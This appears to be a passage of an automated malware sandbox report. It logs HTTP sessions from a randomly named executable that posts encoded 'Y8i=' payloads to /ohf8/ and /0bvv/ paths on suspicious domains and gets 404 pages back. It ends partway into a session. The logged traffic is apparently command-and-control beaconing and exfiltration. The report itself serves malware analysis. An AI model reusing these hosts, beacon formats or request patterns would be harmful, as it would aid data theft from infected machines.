                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.449869209.74.64.187803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:23.509216070 CET760OUTPOST /ohf8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.jagdud.store
                                                                                Origin: http://www.jagdud.store
                                                                                Referer: http://www.jagdud.store/ohf8/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 6f 6e 52 39 41 76 67 78 72 56 42 48 57 31 43 42 6f 54 68 4a 65 74 39 4c 52 4b 6f 37 48 76 43 4b 37 4c 54 63 2f 38 76 4d 4d 52 71 49 7a 34 68 4c 39 2b 39 61 76 56 49 45 73 67 42 6c 75 6c 2b 6f 39 6e 59 35 4b 6a 4a 66 6b 49 69 6c 77 38 74 39 53 49 6f 2b 42 4b 6f 57 31 30 4d 68 41 6a 4e 6a 5a 47 35 74 43 67 34 71 7a 65 52 6d 73 6c 37 71 45 56 71 71 65 71 7a 51 79 66 36 50 76 6a 57 77 2f 58 4e 5a 6d 30 76 57 6e 56 38 77 2f 55 44 37 73 79 63 49 6d 63 4a 77 42 52 72 62 34 61 62 73 69 69 32 6d 32 63 4c 76 6d 47 55 36 6f 63 67 4c 44 66 72 4f 73 74 30 6d 5a 61 4d 75 2b 47 43 72 44 77 3d 3d
                                                                                Data Ascii: Y8i=onR9AvgxrVBHW1CBoThJet9LRKo7HvCK7LTc/8vMMRqIz4hL9+9avVIEsgBlul+o9nY5KjJfkIilw8t9SIo+BKoW10MhAjNjZG5tCg4qzeRmsl7qEVqqeqzQyf6PvjWw/XNZm0vWnV8w/UD7sycImcJwBRrb4absii2m2cLvmGU6ocgLDfrOst0mZaMu+GCrDw==
                                                                                Nov 17, 2024 08:36:24.217346907 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:36:24 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.449884209.74.64.187803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:26.046874046 CET780OUTPOST /ohf8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.jagdud.store
                                                                                Origin: http://www.jagdud.store
                                                                                Referer: http://www.jagdud.store/ohf8/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 6f 6e 52 39 41 76 67 78 72 56 42 48 56 56 79 42 76 77 4a 4a 53 64 39 4b 64 71 6f 37 64 66 44 42 37 4c 66 63 2f 2f 6a 6d 4d 69 4f 49 7a 5a 78 4c 76 71 52 61 2f 46 49 45 34 51 42 73 67 46 2b 76 39 6e 63 48 4b 6d 78 66 6b 49 6d 6c 77 39 64 39 53 62 77 39 44 61 6f 59 70 30 4d 6a 64 7a 4e 6a 5a 47 35 74 43 67 63 51 7a 61 31 6d 72 55 4c 71 45 77 4b 70 64 71 7a 58 6d 50 36 50 72 6a 58 35 2f 58 4e 2f 6d 31 7a 77 6e 54 77 77 2f 56 7a 37 73 67 30 4c 73 63 4a 79 50 78 71 74 2b 71 32 45 6b 51 33 59 2f 4c 6a 62 6b 6d 74 64 74 61 78 52 53 75 4b 5a 2b 74 51 56 45 64 46 61 7a 46 2f 69 59 79 50 58 41 37 44 52 35 36 79 7a 64 4e 47 38 6e 56 4e 4d 32 6c 45 3d
                                                                                Data Ascii: Y8i=onR9AvgxrVBHVVyBvwJJSd9Kdqo7dfDB7Lfc//jmMiOIzZxLvqRa/FIE4QBsgF+v9ncHKmxfkImlw9d9Sbw9DaoYp0MjdzNjZG5tCgcQza1mrULqEwKpdqzXmP6PrjX5/XN/m1zwnTww/Vz7sg0LscJyPxqt+q2EkQ3Y/LjbkmtdtaxRSuKZ+tQVEdFazF/iYyPXA7DR56yzdNG8nVNM2lE=
                                                                                Nov 17, 2024 08:36:26.715523958 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:36:26 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.449900209.74.64.187803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:28.596765041 CET10862OUTPOST /ohf8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.jagdud.store
                                                                                Origin: http://www.jagdud.store
                                                                                Referer: http://www.jagdud.store/ohf8/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 6f 6e 52 39 41 76 67 78 72 56 42 48 56 56 79 42 76 77 4a 4a 53 64 39 4b 64 71 6f 37 64 66 44 42 37 4c 66 63 2f 2f 6a 6d 4d 69 47 49 7a 75 78 4c 39 62 52 61 38 46 49 45 6b 41 42 70 67 46 2f 7a 39 6e 6b 4c 4b 6d 4d 6f 6b 4e 36 6c 78 66 6c 39 44 36 77 39 4b 61 6f 59 78 30 4d 67 41 6a 4e 32 5a 47 70 70 43 67 73 51 7a 61 31 6d 72 57 54 71 4e 46 71 70 62 71 7a 51 79 66 36 4c 76 6a 58 56 2f 58 55 4b 6d 31 48 47 6e 6a 51 77 2b 31 6a 37 2f 44 63 4c 67 63 4a 30 4f 42 71 6c 2b 71 36 62 6b 52 61 70 2f 4f 65 4f 6b 6c 78 64 73 65 67 39 42 50 2b 45 67 37 41 39 62 2f 59 39 79 30 54 4f 51 42 7a 33 45 2f 6e 70 6b 4c 48 62 59 64 33 62 33 77 4e 51 6f 67 54 37 74 46 62 2b 4e 6b 2f 31 35 34 42 47 79 45 41 68 4c 54 39 34 57 69 6d 44 70 78 6f 32 73 39 74 71 69 7a 61 76 58 78 66 78 39 44 6d 4c 4a 41 4f 51 6d 59 32 69 41 71 30 50 31 4e 32 38 55 68 6b 51 34 63 38 73 73 77 54 42 63 5a 74 6b 6e 49 49 50 73 38 77 58 4a 6a 39 67 43 6b 77 64 61 33 37 59 73 64 54 41 47 4b 49 46 36 70 67 41 76 44 55 4c 79 6f 62 74 6d 2f [TRUNCATED]
                                                                                Data Ascii: Y8i=onR9AvgxrVBHVVyBvwJJSd9Kdqo7dfDB7Lfc//jmMiGIzuxL9bRa8FIEkABpgF/z9nkLKmMokN6lxfl9D6w9KaoYx0MgAjN2ZGppCgsQza1mrWTqNFqpbqzQyf6LvjXV/XUKm1HGnjQw+1j7/DcLgcJ0OBql+q6bkRap/OeOklxdseg9BP+Eg7A9b/Y9y0TOQBz3E/npkLHbYd3b3wNQogT7tFb+Nk/154BGyEAhLT94WimDpxo2s9tqizavXxfx9DmLJAOQmY2iAq0P1N28UhkQ4c8sswTBcZtknIIPs8wXJj9gCkwda37YsdTAGKIF6pgAvDULyobtm/4/FSwlaq0cH4Qu3p0+PPyWnLEDC9UKayp4VftB4hVLzISsFBfQwSnvT7XF12/ZIee2CER/515mTny5TsV6H2BMc0TXQhDo1JiwL8vaoEwinFuaNxYrRvGepNeDE7998I35X/Qk79gHiEZ/Bbjl32/sDHExd3UtYbkDPKTkwrDYY90VpCwJsoSf4lKESKAhke7GhrtEtQrDAfLvownYGSSeu/6tvgiuXPny3/vJ7QNSXa1uit6pHByUOnSiGmDURmalGu3ifMOG7XRAdL+TUsIsvA+LGu/YF2H9mObE0XrdN2AN3jE/fYOWZAefI4xeIV25JPxmiYVHOWr23JyaZiulgRRQmen5LtdU+jBlclQvbMMIWrCgOlFK4DgZC3fUK7s3npvdaBMSNF/EMRhfhVznLDg6ZWy/IWoqehCJoOhjct9f8KSTLIvmJdlbV9IFdCZNTo2qtEwbAQYin1IrSDcHhsUX1kXEpzS3SSLuYdn0BnX1EtWlIaOVj9zVoZc7i5lueLMpmr/Uv9VFoMD708HEKzw1X5p78wKlTKPTBxcTE09wDi+FeROXkzK6zvKCU6E2k6ma+BmVKK8vpqFhozwn/OhwYB91HH5y4suBs0JqybQQfYY/v/YB8tsW7/MPgL3FHCnKJHshHmsEnZm5HZ5MyPra2TZyLqEU [TRUNCATED]
                                                                                Nov 17, 2024 08:36:29.281151056 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:36:29 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.449915209.74.64.187803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:31.137388945 CET501OUTGET /ohf8/?gvyXe=EtxTw6OpYVppMB&Y8i=ll5dDbshsmxjCV2Jki1rRe0WTYojaPmnmIrEqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqD9wq62ogBAVACXMNGlc+5YxBk1nmOhOQVvg= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.jagdud.store
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:36:31.825643063 CET548INHTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:36:31 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.449989162.0.215.33803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:45.010999918 CET787OUTPOST /0bvv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.nieuws-july202541.sbs
                                                                                Origin: http://www.nieuws-july202541.sbs
                                                                                Referer: http://www.nieuws-july202541.sbs/0bvv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 47 75 78 46 63 2b 73 58 4c 79 62 58 38 74 6d 56 64 70 6e 2f 36 70 49 6f 73 67 44 58 59 2f 55 7a 76 79 39 65 78 4f 48 72 59 43 6e 4f 67 70 4b 4c 61 61 33 46 4a 67 39 6f 68 30 43 71 48 62 33 70 52 51 6f 72 64 74 61 38 2f 30 76 35 30 6a 58 41 64 36 4f 68 4a 4b 57 4c 6c 35 6a 61 6a 68 6e 4c 45 55 61 54 76 75 61 6c 4f 70 6f 5a 64 48 54 4b 58 76 38 46 6d 50 47 76 62 67 68 71 62 74 54 68 48 7a 51 35 46 72 4f 49 51 67 41 58 33 50 5a 51 62 61 38 69 2b 76 6a 33 54 72 56 70 69 57 74 50 2f 33 64 57 46 4a 6d 50 49 77 48 33 56 45 37 33 48 44 7a 66 78 6b 4f 4d 68 73 4b 55 38 4a 76 33 34 77 3d 3d
                                                                                Data Ascii: Y8i=GuxFc+sXLybX8tmVdpn/6pIosgDXY/Uzvy9exOHrYCnOgpKLaa3FJg9oh0CqHb3pRQordta8/0v50jXAd6OhJKWLl5jajhnLEUaTvualOpoZdHTKXv8FmPGvbghqbtThHzQ5FrOIQgAX3PZQba8i+vj3TrVpiWtP/3dWFJmPIwH3VE73HDzfxkOMhsKU8Jv34w==
                                                                                Nov 17, 2024 08:36:45.687773943 CET1236INHTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                content-type: text/html
                                                                                transfer-encoding: chunked
                                                                                content-encoding: gzip
                                                                                vary: Accept-Encoding
                                                                                date: Sun, 17 Nov 2024 07:36:45 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                Data Ascii: 1352ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                                Nov 17, 2024 08:36:45.687886000 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                                Nov 17, 2024 08:36:45.687921047 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                                Nov 17, 2024 08:36:45.687953949 CET1236INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                                Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                                Nov 17, 2024 08:36:45.687988043 CET294INData Raw: 44 f0 3a e6 d9 e5 de 2e 9c ef 06 f0 4f c8 5f 09 75 7d c5 fc 89 2c d7 ec 7f 0a dc cf 40 f5 a7 17 54 fd f9 53 6d 5c 04 7e 6f cb eb 1d 9f 87 ff 48 63 40 9d ef 94 f0 ac aa bb 6f 8f f0 67 ab 1e e1 8f cc 73 03 a8 0f f8 ba 8a 10 af 2c 3e 3e 57 f6 de 2b
                                                                                Data Ascii: D:.O_u},@TSm\~oHc@ogs,>>W+Lmu^fuaOmkt]zLr@8uUxvL|oe OP&uNp^60n`f?{T1_>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.450001162.0.215.33803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:47.550487041 CET807OUTPOST /0bvv/ HTTP/1.1
